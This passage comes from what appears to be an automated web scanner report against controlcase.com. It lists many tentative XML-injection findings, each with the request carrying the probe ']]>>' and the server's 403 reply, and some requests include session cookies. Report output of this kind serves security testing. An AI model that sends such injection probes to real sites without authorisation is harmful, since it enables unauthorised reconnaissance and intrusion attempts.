The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /compliance_scanner.htm]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:20:29 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.28. http://controlcase.com/css/pciscans.css [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /css/pciscans.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /css]]>>/pciscans.css HTTP/1.1
Host: controlcase.com
Proxy-Connection: keep-alive
Referer: http://controlcase.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:18:20 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.29. http://controlcase.com/css/pciscans.css [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /css/pciscans.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /css/pciscans.css]]>> HTTP/1.1
Host: controlcase.com
Proxy-Connection: keep-alive
Referer: http://controlcase.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:18:30 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.30. http://controlcase.com/css/style.css [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /css/style.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /css]]>>/style.css HTTP/1.1
Host: controlcase.com
Proxy-Connection: keep-alive
Referer: http://controlcase.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:18:33 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.31. http://controlcase.com/css/style.css [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /css/style.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /css/style.css]]>> HTTP/1.1
Host: controlcase.com
Proxy-Connection: keep-alive
Referer: http://controlcase.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:18:43 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.32. http://controlcase.com/data_discovery.htm [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /data_discovery.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /data_discovery.htm]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:20:43 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.33. http://controlcase.com/data_discovery.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /data_discovery.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /data_discovery.php]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:26:25 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.34. http://controlcase.com/events_pr.htm [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /events_pr.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /events_pr.htm]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:25:47 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.35. http://controlcase.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
Host: controlcase.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _pk_id.3.4216=e72cf29c5d1c4bcd.1303664485.1.1303664485.1303664485; _pk_ses.3.4216=*; __utmz=208121856.1303664485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208121856.1998732058.1303664485.1303664485.1303664485.1; __utmc=208121856; __utmb=208121856.1.10.1303664485

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:12:06 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.36. http://controlcase.com/financial_gapanalysis_certification.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /financial_gapanalysis_certification.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /financial_gapanalysis_certification.html]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:23:33 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.37. http://controlcase.com/flashbanner/js/swfobject.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /flashbanner/js/swfobject.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /flashbanner]]>>/js/swfobject.js HTTP/1.1
Host: controlcase.com
Proxy-Connection: keep-alive
Referer: http://controlcase.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:24:37 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.38. http://controlcase.com/flashbanner/js/swfobject.js [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /flashbanner/js/swfobject.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /flashbanner/js]]>>/swfobject.js HTTP/1.1
Host: controlcase.com
Proxy-Connection: keep-alive
Referer: http://controlcase.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:24:54 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.39. http://controlcase.com/flashbanner/js/swfobject.js [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /flashbanner/js/swfobject.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /flashbanner/js/swfobject.js]]>> HTTP/1.1
Host: controlcase.com
Proxy-Connection: keep-alive
Referer: http://controlcase.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:25:09 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.40. http://controlcase.com/flashbanner/preview.swf [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /flashbanner/preview.swf

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /flashbanner]]>>/preview.swf HTTP/1.1
Host: controlcase.com
Proxy-Connection: keep-alive
Referer: http://controlcase.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _pk_id.3.4216=e72cf29c5d1c4bcd.1303664485.1.1303664485.1303664485; _pk_ses.3.4216=*; __utmz=208121856.1303664485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208121856.1998732058.1303664485.1303664485.1303664485.1; __utmc=208121856; __utmb=208121856.1.10.1303664485

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:16:38 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.41. http://controlcase.com/flashbanner/preview.swf [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /flashbanner/preview.swf

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /flashbanner/preview.swf]]>> HTTP/1.1
Host: controlcase.com
Proxy-Connection: keep-alive
Referer: http://controlcase.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _pk_id.3.4216=e72cf29c5d1c4bcd.1303664485.1.1303664485.1303664485; _pk_ses.3.4216=*; __utmz=208121856.1303664485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208121856.1998732058.1303664485.1303664485.1303664485.1; __utmc=208121856; __utmb=208121856.1.10.1303664485

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:16:47 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.42. http://controlcase.com/industry_developer_gapanalysis_certification.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /industry_developer_gapanalysis_certification.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /industry_developer_gapanalysis_certification.html]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:24:37 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.43. http://controlcase.com/industry_financial_vulnerability_scans.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /industry_financial_vulnerability_scans.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /industry_financial_vulnerability_scans.html]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:24:24 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.44. http://controlcase.com/industry_merchant_gapanalysis_certification.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /industry_merchant_gapanalysis_certification.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /industry_merchant_gapanalysis_certification.html]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:22:59 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.45. http://controlcase.com/industry_merchant_vendor_management.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /industry_merchant_vendor_management.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /industry_merchant_vendor_management.html]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:23:13 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.46. http://controlcase.com/industry_merchant_vulnerability_scans.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /industry_merchant_vulnerability_scans.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

